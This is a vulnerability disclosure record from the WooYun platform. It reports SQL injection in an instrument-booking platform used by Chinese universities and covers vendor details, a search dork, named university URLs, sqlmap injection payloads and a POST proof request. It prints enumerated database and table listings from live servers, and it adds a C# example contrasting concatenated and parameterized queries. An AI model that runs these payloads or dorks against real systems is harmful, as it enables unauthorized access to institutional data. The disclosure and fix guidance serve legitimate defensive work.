
Vulnerability summary (24 followers)

Defect ID: wooyun-2014-062534

Title: SQL injection in a widely deployed instrument-management platform used by educational institutions

Related vendor: cncert (National Internet Emergency Center)

Author:

Submitted: 2014-05-28 12:59

Fixed: 2014-08-26 13:00

Published: 2014-08-26 13:00

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: handed over to a third-party partner organization (cncert, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-05-28: Details reported to the vendor, awaiting vendor handling
2014-06-01: Vendor has confirmed; details disclosed to the vendor only
2014-06-04: Details opened to third-party security partners
2014-07-26: Details disclosed to core white hats and relevant domain experts
2014-08-05: Details disclosed to regular white hats
2014-08-15: Details disclosed to intern white hats
2014-08-26: Details disclosed to the public

Summary:

A widely deployed instrument-management platform used by educational institutions is vulnerable to SQL injection.

Details:

1. Vendor name: 南京先极科技有限公司 (Nanjing Xianji Technology Co., Ltd.)
2. Website: http://www.changedu.com/
3. Product name: 大型仪器设备开放共享管理平台 (Large-Scale Instrument and Equipment Open Sharing Management Platform)
4. Customer cases displayed on the vendor website:

[Screenshots q1.jpg to q5.jpg: customer cases shown on the vendor website]


Search Google and Baidu for: 大型仪器设备开放共享管理平台
or for inurl:ShowFiles/BookEquList.aspx
A few instances, listed for cncert testing only:
http://eq.njfu.edu.cn/ShowFiles/BookEquList.aspx (user organization: Nanjing Forestry University)
http://210.29.132.248/ShowFiles/BookEquList.aspx (user organization: Nanjing Normal University, School of Chemistry and Materials Science)
http://sjjx.njit.edu.cn/sy/share/ShowFiles/BookEquList.aspx (user organization: Nanjing Institute of Technology)
http://web168444.5udns.cn/ShowFiles/BookEquList.aspx (user organization: also Nanjing Normal University)
http://ies.hhit.edu.cn/ShowFiles/BookEquList.aspx (user organization: Huaihai Institute of Technology)
In every case the injection point is the instrument search on the booking-list page.

[Screenshots c1.jpg and c3.jpg: the instrument search on the booking-list page]


POST injection. Vulnerable file: ShowFiles/BookEquList.aspx (both the txtCode parameter, the instrument code, and the txtName parameter, the instrument name, are injectable).
Taking Nanjing Forestry University as the example:

[Screenshot c5.jpg: the search request against the Nanjing Forestry University instance]

http://eq.njfu.edu.cn/ShowFiles/BookEquList.aspx
POST data: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=&username=&txtCode=s&txtName=s&txtksdate=&txtjsdate=&ImageButton1.x=35&ImageButton1.y=14&txtye=


---
Place: POST
Parameter: txtName
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase stacked conditional-error blind queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=&username=&txtCode=s&txtName=s'; IF(5707=5707) SELECT 5707 ELSE DROP FUNCTION ZYzh--&txtksdate=&txtjsdate=&ImageButton1.x=35&ImageButton1.y=14&txtye=
Type: UNION query
Title: Generic UNION query (NULL) - 77 columns
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=&username=&txtCode=s&txtName=s' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(105)+CHAR(99)+CHAR(105)+CHAR(113)+CHAR(114)+CHAR(78)+CHAR(105)+CHAR(77)+CHAR(78)+CHAR(101)+CHAR(65)+CHAR(115)+CHAR(98)+CHAR(76)+CHAR(113)+CHAR(101)+CHAR(109)+CHAR(105)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &txtksdate=&txtjsdate=&ImageButton1.x=35&ImageButton1.y=14&txtye=
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=&username=&txtCode=s&txtName=s'; WAITFOR DELAY '0:0:5'--&txtksdate=&txtjsdate=&ImageButton1.x=35&ImageButton1.y=14&txtye=
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=&username=&txtCode=s&txtName=s' WAITFOR DELAY '0:0:5'--&txtksdate=&txtjsdate=&ImageButton1.x=35&ImageButton1.y=14&txtye=
---
[16:14:54] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000


available databases [13]:
[*] cs
[*] db_ldyl
[*] db_nldhxgc
[*] db_qcyy
[*] master
[*] model
[*] msdb
[*] NL_ArtDesign
[*] NL_LargeEquipment
[*] NL_TreeStatisticsData
[*] Northwind
[*] pubs
[*] tempdb


Database: NL_LargeEquipment
[59 tables]
+-------------------------+
| T_BookEquFund |
| T_BookRecord |
| T_BookRiZhi |
| T_CardUseLog |
| T_ChangeShuaKa |
| T_DsCardUseLog |
| T_EquipPrincipal |
| T_FMessage |
| T_FinanceSide |
| T_Log |
| T_LunWenImport |
| T_LunWenImport |
| T_News |
| T_Relation |
| T_RelationSubject |
| T_RelationSubjectSystem |
| T_RunningAccount |
| T_SMessage |
| T_XueYuan |
| T_Yqwx |
| T_ZhuanYe |
| dtproperties |
| shuaka_ip |
| sysconstraints |
| syssegments |
| t_ChangeRecord |
| t_DataDic |
| t_DicUserid |
| t_bigxk |
| t_bookEquipment |
| t_cyplan1 |
| t_cyplan1 |
| t_equipmentDetail |
| t_equipmentDetail |
| t_equipmentType |
| t_equstate |
| t_experiment |
| t_files |
| t_flag |
| t_folder |
| t_fujian |
| t_fyrecord |
| t_gzry |
| t_hourse |
| t_ip |
| t_lable |
| t_message |
| t_project |
| t_rulekf |
| t_test |
| t_user |
| t_user |
| t_xfrecord |
| t_xmyq |
| t_zone |
| v_RunningAccount |
| xi |
| xueyuan |
| zhuanye |
+-------------------------+
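The sqlmap findings above (stacked queries, WAITFOR delays, a 77-column UNION) are what you get when the txtCode and txtName form values are spliced straight into the SQL text. The following is an added example, not the vendor's code and not taken from this report: a hypothetical ADO.NET code-behind helper for BookEquList.aspx that shows the concatenation pattern beside a parameterized query for the same search. The table name t_bookEquipment comes from the enumerated table list above; the column names EquCode and EquName, the class name and the parameter lengths are assumptions.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

// Hypothetical code-behind helper for the BookEquList.aspx instrument search.
// Not the vendor's code; written here to contrast the two query styles.
public static class BookEquListSearch
{
    // Vulnerable pattern: the two form fields are spliced into the SQL text, so a
    // quote in txtName or txtCode closes the string literal and the rest of the
    // input becomes part of the statement. On SQL Server the stacked-query and
    // WAITFOR findings in the report follow directly from this.
    public static string BuildUnsafeQuery(string txtCode, string txtName)
    {
        // Column names EquCode/EquName are assumptions; t_bookEquipment is from the table list.
        return "SELECT EquCode, EquName FROM t_bookEquipment WHERE EquCode LIKE '%"
             + txtCode + "%' AND EquName LIKE '%" + txtName + "%'";
    }

    // SQL Server LIKE treats %, _ and [ as wildcards; escape them so a search for
    // a literal "%" does not silently become "match everything".
    public static string EscapeLike(string s)
    {
        return s.Replace("[", "[[]").Replace("%", "[%]").Replace("_", "[_]");
    }

    // Hardened version: the statement text is fixed and the user values travel as
    // typed parameters, so quotes, semicolons and "--" in the input are data only.
    public static DataTable SearchEquipment(SqlConnection conn, string txtCode, string txtName)
    {
        const string sql =
            "SELECT EquCode, EquName FROM t_bookEquipment " +
            "WHERE EquCode LIKE @code AND EquName LIKE @name";

        using (SqlCommand cmd = new SqlCommand(sql, conn))
        {
            cmd.CommandType = CommandType.Text;
            // Wildcards are added on the application side of the parameter boundary;
            // the user cannot change the structure of the statement.
            cmd.Parameters.Add("@code", SqlDbType.NVarChar, 50).Value =
                "%" + EscapeLike(txtCode ?? string.Empty) + "%";
            cmd.Parameters.Add("@name", SqlDbType.NVarChar, 100).Value =
                "%" + EscapeLike(txtName ?? string.Empty) + "%";

            DataTable result = new DataTable();
            using (SqlDataAdapter adapter = new SqlDataAdapter(cmd))
            {
                adapter.Fill(result);
            }
            return result;
        }
    }
}
```

Two points worth checking when reviewing a fix like this on ASP.NET 2.0 / SQL Server 2000: every query path that reads a form field needs the same treatment, since the report shows two separate parameters on one page were both injectable; and the database listing above (master, msdb, Northwind, pubs and unrelated application databases all visible) shows the application login had far more reach than a booking-list search needs, so restricting that login to its own database limits what any residual injection can enumerate.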

Proof of vulnerability:

Nanjing Institute of Technology
http://sjjx.njit.edu.cn/sy/share/ShowFiles/BookEquList.aspx
post:__VIEWSTATE=%2FwEPDwUKLTMzNDAzNDE1Mg9kFgICAw9kFgQCBg8WAh4LXyFJdGVtQ291bnQCBRYKAgEPZBYCZg8VCAnkvZnlkI7nv5QSMjAxMy0zLTI1IDE3OjMwOjE5CDAwMDI2Njg0Kk1QU%2BaooeWdl%2BWMlueUn%2BS6p%2BWKoOW3peezu%2Be7n%2BaVmeWtpuiuvuWkhxAyMDEzLTAzLTExIDA5OjMwEDIwMTMtMDMtMTEgMTA6MzAJ546L5LqR5aKeDOetieW%2BheWuoeaguGQCAg9kFgJmDxUICeiWm%2BS6muWGmxEyMDEzLTMtMTEgOTozMDoxOQgwMDAyNjY4NCpNUFPmqKHlnZfljJbnlJ%2FkuqfliqDlt6Xns7vnu5%2FmlZnlraborr7lpIcQMjAxMy0wMy0xMyAwODozMBAyMDEzLTAzLTEzIDExOjMwAAzlrqHmoLjpgJrov4dkAgMPZBYCZg8VCAnnpZ3kuLnnpaUSMjAxMy0zLTI0IDEwOjMwOjE5CDAwMDI3MTA3KuWNmuS4luWKm%2BWjq%2BS5kOawlOWKqOaVmeWtpuWfueiureijhee9rkRTMxAyMDEzLTAzLTEwIDA5OjAwEDIwMTMtMDMtMTAgMTE6MDAJ546L5a6P5LyfDOetieW%2BheWuoeaguGQCBA9kFgJmDxUICeaIkOaZk%2BW9pBEyMDEzLTMtMjQgODozMDoxOQgwMDAyNjg2OC9GTVPmn5TmgKfmqKHlnZfljJbnlJ%2Fkuqfns7vnu58tLeacuuWZqOS6uuWNleWFgxAyMDEzLTAzLTI5IDA4OjAwEDIwMTMtMDMtMjkgMTA6MDAG6ZmI5YCpDOetieW%2BheWuoeaguGQCBQ9kFgJmDxUICeW8uuS7gemcnhEyMDEzLTMtMjIgODozMDoxOQgwMDAyNzAyNSrljZrkuJblipvlo6vkuZDmtrLljovmlZnlrabln7norq3oo4Xnva5EUzQQMjAxMy0wNC0wOCAxMDowMBAyMDEzLTA0LTA4IDEyOjAwCeWxheWbveaJjQznrYnlvoXlrqHmoLhkAgcPFgIeB1Zpc2libGVoFgJmD2QWAmYPZBYKAgcPDxYCHgRUZXh0BQExZGQCCQ8PFgQfAgUP56ys5LiA6aG1Jm5ic3A7HgdFbmFibGVkaGRkAgoPDxYEHwIFFSZuYnNwO%2BS4iuS4gOmhtSZuYnNwOx8DaGRkAgsPDxYCHwNoZGQCDQ8PFgIfA2hkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUMSW1hZ2VCdXR0b24xrmuq2hIrjllOd073CzfiKLNhXLs%3D&username=&txtName=s&txtCode=&txtksdate=&txtjsdate=&ImageButton1.x=36&ImageButton1.y=11&__EVENTVALIDATION=%2FwEWBwK0%2BuTVBgKvpuq2CALEhISFCwLChPzDDQK1wNu3DwK1wM%2F8AQLSwpnTCBdnN9Rua7Hd0N4MHlER6%2F7tC6b2

available databases [11]:
[*] master
[*] model
[*] msdb
[*] ngc_jingsai
[*] NJGC_ChuangXin
[*] NJGC_lw
[*] NJGC_SY
[*] NJGC_Teach
[*] Northwind
[*] pubs
[*] tempdb


Database: NJGC_SY
[192 tables]
+-------------------------+
| T_Bg1 |
| T_Bg3 |
| T_Bg6 |
| T_BookRecord |
| T_BookRiZhi |
| T_ChangeShuaKa |
| T_ChangeShuaKakq |
| T_FMessage |
| T_HzOld1 |
| T_HzOld2 |
| T_HzOld3 |
| T_HzOld4 |
| T_HzOld5 |
| T_HzOld6 |
| T_HzOld7 |
| T_HzOld8 |
| T_JsRole |
| T_Log |
| T_News |
| T_PingJia |
| T_RenWuShu |
| T_SMessage |
| T_UserDetail |
| T_YhpCk |
| T_YhpRk |
| T_YihaoPing |
| T_Yqwx |
| T_YuSuan |
| T_ZhiBiao |
| T_change_kb |
| T_jwjh |
| T_jwjh20140113sun |
| T_kbjsvalue |
| T_ChangeShuaKakq(ceshi) |
| area |
| bigxkname |
| centuser |
| centuser2 |
| cssun |
| dtproperties |
| fjuser |
| kebiaorq |
| kebiaoxz |
| kebiaozc |
| province |
| shuaka_ip |
| smallxkname |
| sqlmapoutput |
| sys_DataDic |
| sys_privilege |
| sysconstraints |
| syssegments |
| t_ChangeRecord |
| t_ChangeRecordold |
| t_KeBiaoXMQz |
| t_bg2 |
| t_bg4 |
| t_bg7 |
| t_bg8 |
| t_bigxk |
| t_bookEquipment |
| t_canshu |
| t_changerecordjs |
| t_chengjiRate |
| t_class |
| t_course |
| t_coursexy |
| t_didian |
| t_drKbs |
| t_drkb |
| t_drkbxs |
| t_equipment |
| t_equipmentDetail |
| t_equipmentType |
| t_equipmentsb |
| t_equjxxx |
| t_experiment |
| t_fbxm |
| t_files |
| t_flag |
| t_folder |
| t_fyrecord |
| t_gj |
| t_hourse |
| t_jiaocai |
| t_jmyqdata |
| t_jmyqdatasb |
| t_jsxyid |
| t_kbfzjs |
| t_kbxs |
| t_kbxsvalue |
| t_kcchengji |
| t_kcsj |
| t_kcxkxsqr |
| t_kcxkxsqr2 |
| t_kebiao |
| t_kebiao_20140113sun |
| t_kebiaovalue |
| t_key |
| t_keyan |
| t_lable |
| t_lilun |
| t_links |
| t_message |
| t_procent |
| t_profj |
| t_project |
| t_projs |
| t_propc |
| t_rigisterUser |
| t_rulekf |
| t_ryqx |
| t_sbxm |
| t_sjbigxk |
| t_sjcgjl |
| t_sjdate |
| t_sjwhcd |
| t_sjzcdata |
| t_skyxtime |
| t_smallxk |
| t_sqsy |
| t_sqyyvalue |
| t_sybg |
| t_sycentlist |
| t_synews |
| t_sysjbqkdata |
| t_sysys |
| t_temp |
| t_user |
| t_userother |
| t_xfrecord |
| t_xk |
| t_xkxs |
| t_xmchengji |
| t_xmvalue |
| t_xmyq |
| t_xsinsertlab |
| t_xskbscore |
| t_xsteam |
| t_xsteam2 |
| t_xueqi |
| t_xwlujin |
| t_year |
| t_yhkxq |
| t_yqbx |
| t_yykbaddr |
| t_yyshiyan |
| t_yysyxs |
| t_ziyuan |
| t_zone |
| v_huizongRSS |
| v_huizong_4 |
| v_hzjob |
| v_jsskxylist |
| v_jsxyxslist |
| v_kbxslist |
| v_kebiao |
| v_message |
| v_messageddhf |
| v_messagejs |
| v_messagejsgxygly |
| v_messagelookhf |
| v_messagexs |
| v_sqxm |
| v_sysys |
| v_teacher |
| v_weekkcgs |
| v_xkxslist |
| v_xscjaddfind |
| v_xskblist |
| v_xsyqlist |
| v_xueji |
| v_xycourse |
| v_xyjiaocai |
| v_xyproject |
| v_xyziyuan |
| v_yqbx |
| v_yykbsjdd |
| v_yyshiyan |
| v_yysyShlist |
| v_yysylist |
| v_yysylistzt |
| workshuaka |
| xiti |
| xiti_xs |
| xkname |
| xueji |
| xueyuan |
| xxx |
| yuxi |
| yuxi_xsjg |
| zhuanye |
+-------------------------+

Fix recommendation:

Not sure whether this is an environment issue.
Some of the POST parameters are very long, and when I run sqlmap under Windows XP the access is refused;
but if I trim some of them it reports an error and no data can be dumped.
sqlmap on Linux should not have this problem, I suppose?

Copyright notice: please credit the source when reposting @乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability rank: 14

Confirmed: 2014-06-01 23:04

Vendor reply:

CNVD confirmed and reproduced the described situation. CNVD is coordinating with the CERNET information center to handle the affected university websites, and has contacted the software vendor 南京先极科技有限公司 (Nanjing Xianji Technology Co., Ltd.) through public channels to report the issue for handling.

Latest status:

None yet